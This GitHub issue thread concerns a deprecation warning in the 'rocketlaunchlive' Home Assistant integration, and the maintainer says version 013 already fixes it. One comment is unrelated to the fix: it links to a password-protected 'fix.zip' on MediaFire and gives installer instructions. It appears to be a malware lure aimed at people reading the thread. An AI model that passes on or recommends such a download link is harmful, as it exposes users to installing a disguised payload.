### ISSUE TITLE
async_forward_entry_setup deprecated

### ISSUE THREAD

**Issue by desosav** [djtimca/harocketlaunchlive#11]
Just wanted to share the following warning that appears in HA logs:

`Detected that custom integration 'rocketlaunchlive' calls async_forward_entry_setup for integration, rocketlaunchlive with title: Rocket Launch Live and entry_id: 9e3bb12c1640b7c9a8abee3257475fe0, which is deprecated and will stop working in Home Assistant 2025.6, await async_forward_entry_setups instead at custom_components/rocketlaunchlive/__init__.py, line 69: await hass.config_entries.async_forward_entry_setup(entry, component), please report it to the author of the 'rocketlaunchlive' custom integration`

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by djtimca** [comment]
This is already fixed in version 013 - please update your integration.
